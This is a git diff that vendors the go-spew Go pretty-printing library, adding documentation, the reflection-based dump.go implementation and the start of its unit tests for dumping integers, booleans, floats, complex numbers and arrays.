+See the Dump example for details on the setup of the types and variables being
+shown here.
+
+ (main.Foo) {
+ unexportedField: (*main.Bar)(0xf84002e210)({
+ flag: (main.Flag) flagTwo,
+ data: (uintptr)
+ }),
+ ExportedField: (map[interface {}]interface {}) (len=1) {
+ (string) (len=3) "one": (bool) true
+ }
+ }
+
+Byte (and uint8) arrays and slices are displayed uniquely like the hexdump -C
+command as shown.
+ ([]uint8) (len=32 cap=32) {
+ 00000000 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 20 |............... |
+ 00000010 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f 30 |!"#$%&'()*+,-./0|
+ 00000020 31 32 |12|
+ }
+
+Custom Formatter
+
+Spew provides a custom formatter that implements the fmt.Formatter interface
+so that it integrates cleanly with standard fmt package printing functions. The
+formatter is useful for inline printing of smaller data types similar to the
+standard %v format specifier.
+
+The custom formatter only responds to the %v (most compact), %+v (adds pointer
+addresses), %#v (adds types), or %#+v (adds types and pointer addresses) verb
+combinations. Any other verbs such as %x and %q will be sent to the the
+standard fmt package for formatting. In addition, the custom formatter ignores
+the width and precision arguments (however they will still work on the format
+specifiers not handled by the custom formatter).
+
+Custom Formatter Usage
+
+The simplest way to make use of the spew custom formatter is to call one of the
+convenience functions such as spew.Printf, spew.Println, or spew.Printf. The
+functions have syntax you are most likely already familiar with:
+
+ spew.Printf("myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+ spew.Printf("myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+ spew.Println(myVar, myVar2)
+ spew.Fprintf(os.Stderr, "myVar1: %v -- myVar2: %+v", myVar1, myVar2)
+ spew.Fprintf(os.Stderr, "myVar3: %#v -- myVar4: %#+v", myVar3, myVar4)
+
+See the Index for the full list convenience functions.
+
+Sample Formatter Output
+
+Double pointer to a uint8:
+ %v: <**>5
+ %+v: <**>(0xf8400420d0->0xf8400420c8)5
+ %#v: (**uint8)5
+ %#+v: (**uint8)(0xf8400420d0->0xf8400420c8)5
+
+Pointer to circular struct with a uint8 field and a pointer to itself:
+ %v: <*>{1 <*>}
+ %+v: <*>(0xf84003e260){ui8:1 c:<*>(0xf84003e260)}
+ %#v: (*main.circular){ui8:(uint8)1 c:(*main.circular)}
+ %#+v: (*main.circular)(0xf84003e260){ui8:(uint8)1 c:(*main.circular)(0xf84003e260)}
+
+See the Printf example for details on the setup of variables being shown
+here.
+
+Errors
+
+Since it is possible for custom Stringer/error interfaces to panic, spew
+detects them and handles them internally by printing the panic information
+inline with the output. Since spew is intended to provide deep pretty printing
+capabilities on structures, it intentionally does not return any errors.
+*/
+package spew
diff --git a/vendor/github.com/davecgh/go-spew/spew/dump.go b/vendor/github.com/davecgh/go-spew/spew/dump.go
new file mode 100644
index 0000000000..df1d582a72
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/dump.go
@@ -0,0 +1,509 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+package spew
+
+import (
+ "bytes"
+ "encoding/hex"
+ "fmt"
+ "io"
+ "os"
+ "reflect"
+ "regexp"
+ "strconv"
+ "strings"
+)
+
+var (
+ // uint8Type is a reflect.Type representing a uint8. It is used to
+ // convert cgo types to uint8 slices for hexdumping.
+ uint8Type = reflect.TypeOf(uint8(0))
+
+ // cCharRE is a regular expression that matches a cgo char.
+ // It is used to detect character arrays to hexdump them.
+ cCharRE = regexp.MustCompile("^.*\\._Ctype_char$")
+
+ // cUnsignedCharRE is a regular expression that matches a cgo unsigned
+ // char. It is used to detect unsigned character arrays to hexdump
+ // them.
+ cUnsignedCharRE = regexp.MustCompile("^.*\\._Ctype_unsignedchar$")
+
+ // cUint8tCharRE is a regular expression that matches a cgo uint8_t.
+ // It is used to detect uint8_t arrays to hexdump them.
+ cUint8tCharRE = regexp.MustCompile("^.*\\._Ctype_uint8_t$")
+)
+
+// dumpState contains information about the state of a dump operation.
+type dumpState struct {
+ w io.Writer
+ depth int
+ pointers map[uintptr]int
+ ignoreNextType bool
+ ignoreNextIndent bool
+ cs *ConfigState
+}
+
+// indent performs indentation according to the depth level and cs.Indent
+// option.
+func (d *dumpState) indent() {
+ if d.ignoreNextIndent {
+ d.ignoreNextIndent = false
+ return
+ }
+ d.w.Write(bytes.Repeat([]byte(d.cs.Indent), d.depth))
+}
+
+// unpackValue returns values inside of non-nil interfaces when possible.
+// This is useful for data types like structs, arrays, slices, and maps which
+// can contain varying types packed inside an interface.
+func (d *dumpState) unpackValue(v reflect.Value) reflect.Value {
+ if v.Kind() == reflect.Interface && !v.IsNil() {
+ v = v.Elem()
+ }
+ return v
+}
+
+// dumpPtr handles formatting of pointers by indirecting them as necessary.
+func (d *dumpState) dumpPtr(v reflect.Value) {
+ // Remove pointers at or below the current depth from map used to detect
+ // circular refs.
+ for k, depth := range d.pointers {
+ if depth >= d.depth {
+ delete(d.pointers, k)
+ }
+ }
+
+ // Keep list of all dereferenced pointers to show later.
+ pointerChain := make([]uintptr, 0)
+
+ // Figure out how many levels of indirection there are by dereferencing
+ // pointers and unpacking interfaces down the chain while detecting circular
+ // references.
+ nilFound := false
+ cycleFound := false
+ indirects := 0
+ ve := v
+ for ve.Kind() == reflect.Ptr {
+ if ve.IsNil() {
+ nilFound = true
+ break
+ }
+ indirects++
+ addr := ve.Pointer()
+ pointerChain = append(pointerChain, addr)
+ if pd, ok := d.pointers[addr]; ok && pd < d.depth {
+ cycleFound = true
+ indirects--
+ break
+ }
+ d.pointers[addr] = d.depth
+
+ ve = ve.Elem()
+ if ve.Kind() == reflect.Interface {
+ if ve.IsNil() {
+ nilFound = true
+ break
+ }
+ ve = ve.Elem()
+ }
+ }
+
+ // Display type information.
+ d.w.Write(openParenBytes)
+ d.w.Write(bytes.Repeat(asteriskBytes, indirects))
+ d.w.Write([]byte(ve.Type().String()))
+ d.w.Write(closeParenBytes)
+
+ // Display pointer information.
+ if !d.cs.DisablePointerAddresses && len(pointerChain) > 0 {
+ d.w.Write(openParenBytes)
+ for i, addr := range pointerChain {
+ if i > 0 {
+ d.w.Write(pointerChainBytes)
+ }
+ printHexPtr(d.w, addr)
+ }
+ d.w.Write(closeParenBytes)
+ }
+
+ // Display dereferenced value.
+ d.w.Write(openParenBytes)
+ switch {
+ case nilFound == true:
+ d.w.Write(nilAngleBytes)
+
+ case cycleFound == true:
+ d.w.Write(circularBytes)
+
+ default:
+ d.ignoreNextType = true
+ d.dump(ve)
+ }
+ d.w.Write(closeParenBytes)
+}
+
+// dumpSlice handles formatting of arrays and slices. Byte (uint8 under
+// reflection) arrays and slices are dumped in hexdump -C fashion.
+func (d *dumpState) dumpSlice(v reflect.Value) {
+ // Determine whether this type should be hex dumped or not. Also,
+ // for types which should be hexdumped, try to use the underlying data
+ // first, then fall back to trying to convert them to a uint8 slice.
+ var buf []uint8
+ doConvert := false
+ doHexDump := false
+ numEntries := v.Len()
+ if numEntries > 0 {
+ vt := v.Index(0).Type()
+ vts := vt.String()
+ switch {
+ // C types that need to be converted.
+ case cCharRE.MatchString(vts):
+ fallthrough
+ case cUnsignedCharRE.MatchString(vts):
+ fallthrough
+ case cUint8tCharRE.MatchString(vts):
+ doConvert = true
+
+ // Try to use existing uint8 slices and fall back to converting
+ // and copying if that fails.
+ case vt.Kind() == reflect.Uint8:
+ // We need an addressable interface to convert the type
+ // to a byte slice. However, the reflect package won't
+ // give us an interface on certain things like
+ // unexported struct fields in order to enforce
+ // visibility rules. We use unsafe, when available, to
+ // bypass these restrictions since this package does not
+ // mutate the values.
+ vs := v
+ if !vs.CanInterface() || !vs.CanAddr() {
+ vs = unsafeReflectValue(vs)
+ }
+ if !UnsafeDisabled {
+ vs = vs.Slice(0, numEntries)
+
+ // Use the existing uint8 slice if it can be
+ // type asserted.
+ iface := vs.Interface()
+ if slice, ok := iface.([]uint8); ok {
+ buf = slice
+ doHexDump = true
+ break
+ }
+ }
+
+ // The underlying data needs to be converted if it can't
+ // be type asserted to a uint8 slice.
+ doConvert = true
+ }
+
+ // Copy and convert the underlying type if needed.
+ if doConvert && vt.ConvertibleTo(uint8Type) {
+ // Convert and copy each element into a uint8 byte
+ // slice.
+ buf = make([]uint8, numEntries)
+ for i := 0; i < numEntries; i++ {
+ vv := v.Index(i)
+ buf[i] = uint8(vv.Convert(uint8Type).Uint())
+ }
+ doHexDump = true
+ }
+ }
+
+ // Hexdump the entire slice as needed.
+ if doHexDump {
+ indent := strings.Repeat(d.cs.Indent, d.depth)
+ str := indent + hex.Dump(buf)
+ str = strings.Replace(str, "\n", "\n"+indent, -1)
+ str = strings.TrimRight(str, d.cs.Indent)
+ d.w.Write([]byte(str))
+ return
+ }
+
+ // Recursively call dump for each item.
+ for i := 0; i < numEntries; i++ {
+ d.dump(d.unpackValue(v.Index(i)))
+ if i < (numEntries - 1) {
+ d.w.Write(commaNewlineBytes)
+ } else {
+ d.w.Write(newlineBytes)
+ }
+ }
+}
+
+// dump is the main workhorse for dumping a value. It uses the passed reflect
+// value to figure out what kind of object we are dealing with and formats it
+// appropriately. It is a recursive function, however circular data structures
+// are detected and handled properly.
+func (d *dumpState) dump(v reflect.Value) {
+ // Handle invalid reflect values immediately.
+ kind := v.Kind()
+ if kind == reflect.Invalid {
+ d.w.Write(invalidAngleBytes)
+ return
+ }
+
+ // Handle pointers specially.
+ if kind == reflect.Ptr {
+ d.indent()
+ d.dumpPtr(v)
+ return
+ }
+
+ // Print type information unless already handled elsewhere.
+ if !d.ignoreNextType {
+ d.indent()
+ d.w.Write(openParenBytes)
+ d.w.Write([]byte(v.Type().String()))
+ d.w.Write(closeParenBytes)
+ d.w.Write(spaceBytes)
+ }
+ d.ignoreNextType = false
+
+ // Display length and capacity if the built-in len and cap functions
+ // work with the value's kind and the len/cap itself is non-zero.
+ valueLen, valueCap := 0, 0
+ switch v.Kind() {
+ case reflect.Array, reflect.Slice, reflect.Chan:
+ valueLen, valueCap = v.Len(), v.Cap()
+ case reflect.Map, reflect.String:
+ valueLen = v.Len()
+ }
+ if valueLen != 0 || !d.cs.DisableCapacities && valueCap != 0 {
+ d.w.Write(openParenBytes)
+ if valueLen != 0 {
+ d.w.Write(lenEqualsBytes)
+ printInt(d.w, int64(valueLen), 10)
+ }
+ if !d.cs.DisableCapacities && valueCap != 0 {
+ if valueLen != 0 {
+ d.w.Write(spaceBytes)
+ }
+ d.w.Write(capEqualsBytes)
+ printInt(d.w, int64(valueCap), 10)
+ }
+ d.w.Write(closeParenBytes)
+ d.w.Write(spaceBytes)
+ }
+
+ // Call Stringer/error interfaces if they exist and the handle methods flag
+ // is enabled
+ if !d.cs.DisableMethods {
+ if (kind != reflect.Invalid) && (kind != reflect.Interface) {
+ if handled := handleMethods(d.cs, d.w, v); handled {
+ return
+ }
+ }
+ }
+
+ switch kind {
+ case reflect.Invalid:
+ // Do nothing. We should never get here since invalid has already
+ // been handled above.
+
+ case reflect.Bool:
+ printBool(d.w, v.Bool())
+
+ case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int:
+ printInt(d.w, v.Int(), 10)
+
+ case reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uint:
+ printUint(d.w, v.Uint(), 10)
+
+ case reflect.Float32:
+ printFloat(d.w, v.Float(), 32)
+
+ case reflect.Float64:
+ printFloat(d.w, v.Float(), 64)
+
+ case reflect.Complex64:
+ printComplex(d.w, v.Complex(), 32)
+
+ case reflect.Complex128:
+ printComplex(d.w, v.Complex(), 64)
+
+ case reflect.Slice:
+ if v.IsNil() {
+ d.w.Write(nilAngleBytes)
+ break
+ }
+ fallthrough
+
+ case reflect.Array:
+ d.w.Write(openBraceNewlineBytes)
+ d.depth++
+ if (d.cs.MaxDepth != 0) && (d.depth > d.cs.MaxDepth) {
+ d.indent()
+ d.w.Write(maxNewlineBytes)
+ } else {
+ d.dumpSlice(v)
+ }
+ d.depth--
+ d.indent()
+ d.w.Write(closeBraceBytes)
+
+ case reflect.String:
+ d.w.Write([]byte(strconv.Quote(v.String())))
+
+ case reflect.Interface:
+ // The only time we should get here is for nil interfaces due to
+ // unpackValue calls.
+ if v.IsNil() {
+ d.w.Write(nilAngleBytes)
+ }
+
+ case reflect.Ptr:
+ // Do nothing. We should never get here since pointers have already
+ // been handled above.
+
+ case reflect.Map:
+ // nil maps should be indicated as different than empty maps
+ if v.IsNil() {
+ d.w.Write(nilAngleBytes)
+ break
+ }
+
+ d.w.Write(openBraceNewlineBytes)
+ d.depth++
+ if (d.cs.MaxDepth != 0) && (d.depth > d.cs.MaxDepth) {
+ d.indent()
+ d.w.Write(maxNewlineBytes)
+ } else {
+ numEntries := v.Len()
+ keys := v.MapKeys()
+ if d.cs.SortKeys {
+ sortValues(keys, d.cs)
+ }
+ for i, key := range keys {
+ d.dump(d.unpackValue(key))
+ d.w.Write(colonSpaceBytes)
+ d.ignoreNextIndent = true
+ d.dump(d.unpackValue(v.MapIndex(key)))
+ if i < (numEntries - 1) {
+ d.w.Write(commaNewlineBytes)
+ } else {
+ d.w.Write(newlineBytes)
+ }
+ }
+ }
+ d.depth--
+ d.indent()
+ d.w.Write(closeBraceBytes)
+
+ case reflect.Struct:
+ d.w.Write(openBraceNewlineBytes)
+ d.depth++
+ if (d.cs.MaxDepth != 0) && (d.depth > d.cs.MaxDepth) {
+ d.indent()
+ d.w.Write(maxNewlineBytes)
+ } else {
+ vt := v.Type()
+ numFields := v.NumField()
+ for i := 0; i < numFields; i++ {
+ d.indent()
+ vtf := vt.Field(i)
+ d.w.Write([]byte(vtf.Name))
+ d.w.Write(colonSpaceBytes)
+ d.ignoreNextIndent = true
+ d.dump(d.unpackValue(v.Field(i)))
+ if i < (numFields - 1) {
+ d.w.Write(commaNewlineBytes)
+ } else {
+ d.w.Write(newlineBytes)
+ }
+ }
+ }
+ d.depth--
+ d.indent()
+ d.w.Write(closeBraceBytes)
+
+ case reflect.Uintptr:
+ printHexPtr(d.w, uintptr(v.Uint()))
+
+ case reflect.UnsafePointer, reflect.Chan, reflect.Func:
+ printHexPtr(d.w, v.Pointer())
+
+ // There were not any other types at the time this code was written, but
+ // fall back to letting the default fmt package handle it in case any new
+ // types are added.
+ default:
+ if v.CanInterface() {
+ fmt.Fprintf(d.w, "%v", v.Interface())
+ } else {
+ fmt.Fprintf(d.w, "%v", v.String())
+ }
+ }
+}
+
+// fdump is a helper function to consolidate the logic from the various public
+// methods which take varying writers and config states.
+func fdump(cs *ConfigState, w io.Writer, a ...interface{}) {
+ for _, arg := range a {
+ if arg == nil {
+ w.Write(interfaceBytes)
+ w.Write(spaceBytes)
+ w.Write(nilAngleBytes)
+ w.Write(newlineBytes)
+ continue
+ }
+
+ d := dumpState{w: w, cs: cs}
+ d.pointers = make(map[uintptr]int)
+ d.dump(reflect.ValueOf(arg))
+ d.w.Write(newlineBytes)
+ }
+}
+
+// Fdump formats and displays the passed arguments to io.Writer w. It formats
+// exactly the same as Dump.
+func Fdump(w io.Writer, a ...interface{}) {
+ fdump(&Config, w, a...)
+}
+
+// Sdump returns a string with the passed arguments formatted exactly the same
+// as Dump.
+func Sdump(a ...interface{}) string {
+ var buf bytes.Buffer
+ fdump(&Config, &buf, a...)
+ return buf.String()
+}
+
+/*
+Dump displays the passed parameters to standard out with newlines, customizable
+indentation, and additional debug information such as complete types and all
+pointer addresses used to indirect to the final value. It provides the
+following features over the built-in printing facilities provided by the fmt
+package:
+
+ * Pointers are dereferenced and followed
+ * Circular data structures are detected and handled properly
+ * Custom Stringer/error interfaces are optionally invoked, including
+ on unexported types
+ * Custom types which only implement the Stringer/error interfaces via
+ a pointer receiver are optionally invoked when passing non-pointer
+ variables
+ * Byte arrays and slices are dumped like the hexdump -C command which
+ includes offsets, byte values in hex, and ASCII output
+
+The configuration options are controlled by an exported package global,
+spew.Config. See ConfigState for options documentation.
+
+See Fdump if you would prefer dumping to an arbitrary io.Writer or Sdump to
+get the formatted result as a string.
+*/
+func Dump(a ...interface{}) {
+ fdump(&Config, os.Stdout, a...)
+}
diff --git a/vendor/github.com/davecgh/go-spew/spew/dump_test.go b/vendor/github.com/davecgh/go-spew/spew/dump_test.go
new file mode 100644
index 0000000000..5aad9c7af0
--- /dev/null
+++ b/vendor/github.com/davecgh/go-spew/spew/dump_test.go
@@ -0,0 +1,1042 @@
+/*
+ * Copyright (c) 2013-2016 Dave Collins
+ *
+ * Permission to use, copy, modify, and distribute this software for any
+ * purpose with or without fee is hereby granted, provided that the above
+ * copyright notice and this permission notice appear in all copies.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+ * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+ * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+ * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+ * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+ * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+ * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+ */
+
+/*
+Test Summary:
+NOTE: For each test, a nil pointer, a single pointer and double pointer to the
+base test element are also tested to ensure proper indirection across all types.
+
+- Max int8, int16, int32, int64, int
+- Max uint8, uint16, uint32, uint64, uint
+- Boolean true and false
+- Standard complex64 and complex128
+- Array containing standard ints
+- Array containing type with custom formatter on pointer receiver only
+- Array containing interfaces
+- Array containing bytes
+- Slice containing standard float32 values
+- Slice containing type with custom formatter on pointer receiver only
+- Slice containing interfaces
+- Slice containing bytes
+- Nil slice
+- Standard string
+- Nil interface
+- Sub-interface
+- Map with string keys and int vals
+- Map with custom formatter type on pointer receiver only keys and vals
+- Map with interface keys and values
+- Map with nil interface value
+- Struct with primitives
+- Struct that contains another struct
+- Struct that contains custom type with Stringer pointer interface via both
+ exported and unexported fields
+- Struct that contains embedded struct and field to same struct
+- Uintptr to 0 (null pointer)
+- Uintptr address of real variable
+- Unsafe.Pointer to 0 (null pointer)
+- Unsafe.Pointer to address of real variable
+- Nil channel
+- Standard int channel
+- Function with no params and no returns
+- Function with param and no returns
+- Function with multiple params and multiple returns
+- Struct that is circular through self referencing
+- Structs that are circular through cross referencing
+- Structs that are indirectly circular
+- Type that panics in its Stringer interface
+*/
+
+package spew_test
+
+import (
+ "bytes"
+ "fmt"
+ "testing"
+ "unsafe"
+
+ "github.com/davecgh/go-spew/spew"
+)
+
+// dumpTest is used to describe a test to be performed against the Dump method.
+type dumpTest struct {
+ in interface{}
+ wants []string
+}
+
+// dumpTests houses all of the tests to be performed against the Dump method.
+var dumpTests = make([]dumpTest, 0)
+
+// addDumpTest is a helper method to append the passed input and desired result
+// to dumpTests
+func addDumpTest(in interface{}, wants ...string) {
+ test := dumpTest{in, wants}
+ dumpTests = append(dumpTests, test)
+}
+
+func addIntDumpTests() {
+ // Max int8.
+ v := int8(127)
+ nv := (*int8)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "int8"
+ vs := "127"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Max int16.
+ v2 := int16(32767)
+ nv2 := (*int16)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "int16"
+ v2s := "32767"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv2, "(*"+v2t+")()\n")
+
+ // Max int32.
+ v3 := int32(2147483647)
+ nv3 := (*int32)(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "int32"
+ v3s := "2147483647"
+ addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+ addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n")
+ addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n")
+ addDumpTest(nv3, "(*"+v3t+")()\n")
+
+ // Max int64.
+ v4 := int64(9223372036854775807)
+ nv4 := (*int64)(nil)
+ pv4 := &v4
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "int64"
+ v4s := "9223372036854775807"
+ addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+ addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n")
+ addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n")
+ addDumpTest(nv4, "(*"+v4t+")()\n")
+
+ // Max int.
+ v5 := int(2147483647)
+ nv5 := (*int)(nil)
+ pv5 := &v5
+ v5Addr := fmt.Sprintf("%p", pv5)
+ pv5Addr := fmt.Sprintf("%p", &pv5)
+ v5t := "int"
+ v5s := "2147483647"
+ addDumpTest(v5, "("+v5t+") "+v5s+"\n")
+ addDumpTest(pv5, "(*"+v5t+")("+v5Addr+")("+v5s+")\n")
+ addDumpTest(&pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")("+v5s+")\n")
+ addDumpTest(nv5, "(*"+v5t+")()\n")
+}
+
+func addUintDumpTests() {
+ // Max uint8.
+ v := uint8(255)
+ nv := (*uint8)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "uint8"
+ vs := "255"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Max uint16.
+ v2 := uint16(65535)
+ nv2 := (*uint16)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "uint16"
+ v2s := "65535"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv2, "(*"+v2t+")()\n")
+
+ // Max uint32.
+ v3 := uint32(4294967295)
+ nv3 := (*uint32)(nil)
+ pv3 := &v3
+ v3Addr := fmt.Sprintf("%p", pv3)
+ pv3Addr := fmt.Sprintf("%p", &pv3)
+ v3t := "uint32"
+ v3s := "4294967295"
+ addDumpTest(v3, "("+v3t+") "+v3s+"\n")
+ addDumpTest(pv3, "(*"+v3t+")("+v3Addr+")("+v3s+")\n")
+ addDumpTest(&pv3, "(**"+v3t+")("+pv3Addr+"->"+v3Addr+")("+v3s+")\n")
+ addDumpTest(nv3, "(*"+v3t+")()\n")
+
+ // Max uint64.
+ v4 := uint64(18446744073709551615)
+ nv4 := (*uint64)(nil)
+ pv4 := &v4
+ v4Addr := fmt.Sprintf("%p", pv4)
+ pv4Addr := fmt.Sprintf("%p", &pv4)
+ v4t := "uint64"
+ v4s := "18446744073709551615"
+ addDumpTest(v4, "("+v4t+") "+v4s+"\n")
+ addDumpTest(pv4, "(*"+v4t+")("+v4Addr+")("+v4s+")\n")
+ addDumpTest(&pv4, "(**"+v4t+")("+pv4Addr+"->"+v4Addr+")("+v4s+")\n")
+ addDumpTest(nv4, "(*"+v4t+")()\n")
+
+ // Max uint.
+ v5 := uint(4294967295)
+ nv5 := (*uint)(nil)
+ pv5 := &v5
+ v5Addr := fmt.Sprintf("%p", pv5)
+ pv5Addr := fmt.Sprintf("%p", &pv5)
+ v5t := "uint"
+ v5s := "4294967295"
+ addDumpTest(v5, "("+v5t+") "+v5s+"\n")
+ addDumpTest(pv5, "(*"+v5t+")("+v5Addr+")("+v5s+")\n")
+ addDumpTest(&pv5, "(**"+v5t+")("+pv5Addr+"->"+v5Addr+")("+v5s+")\n")
+ addDumpTest(nv5, "(*"+v5t+")()\n")
+}
+
+func addBoolDumpTests() {
+ // Boolean true.
+ v := bool(true)
+ nv := (*bool)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "bool"
+ vs := "true"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Boolean false.
+ v2 := bool(false)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "bool"
+ v2s := "false"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+}
+
+func addFloatDumpTests() {
+ // Standard float32.
+ v := float32(3.1415)
+ nv := (*float32)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "float32"
+ vs := "3.1415"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Standard float64.
+ v2 := float64(3.1415926)
+ nv2 := (*float64)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "float64"
+ v2s := "3.1415926"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv2, "(*"+v2t+")()\n")
+}
+
+func addComplexDumpTests() {
+ // Standard complex64.
+ v := complex(float32(6), -2)
+ nv := (*complex64)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "complex64"
+ vs := "(6-2i)"
+ addDumpTest(v, "("+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*"+vt+")()\n")
+
+ // Standard complex128.
+ v2 := complex(float64(-6), 2)
+ nv2 := (*complex128)(nil)
+ pv2 := &v2
+ v2Addr := fmt.Sprintf("%p", pv2)
+ pv2Addr := fmt.Sprintf("%p", &pv2)
+ v2t := "complex128"
+ v2s := "(-6+2i)"
+ addDumpTest(v2, "("+v2t+") "+v2s+"\n")
+ addDumpTest(pv2, "(*"+v2t+")("+v2Addr+")("+v2s+")\n")
+ addDumpTest(&pv2, "(**"+v2t+")("+pv2Addr+"->"+v2Addr+")("+v2s+")\n")
+ addDumpTest(nv2, "(*"+v2t+")()\n")
+}
+
+func addArrayDumpTests() {
+ // Array containing standard ints.
+ v := [3]int{1, 2, 3}
+ vLen := fmt.Sprintf("%d", len(v))
+ vCap := fmt.Sprintf("%d", cap(v))
+ nv := (*[3]int)(nil)
+ pv := &v
+ vAddr := fmt.Sprintf("%p", pv)
+ pvAddr := fmt.Sprintf("%p", &pv)
+ vt := "int"
+ vs := "(len=" + vLen + " cap=" + vCap + ") {\n (" + vt + ") 1,\n (" +
+ vt + ") 2,\n (" + vt + ") 3\n}"
+ addDumpTest(v, "([3]"+vt+") "+vs+"\n")
+ addDumpTest(pv, "(*[3]"+vt+")("+vAddr+")("+vs+")\n")
+ addDumpTest(&pv, "(**[3]"+vt+")("+pvAddr+"->"+vAddr+")("+vs+")\n")
+ addDumpTest(nv, "(*[3]"+vt+")()\n")
+
+ // Array containing type with custom formatter on pointer receiver only.
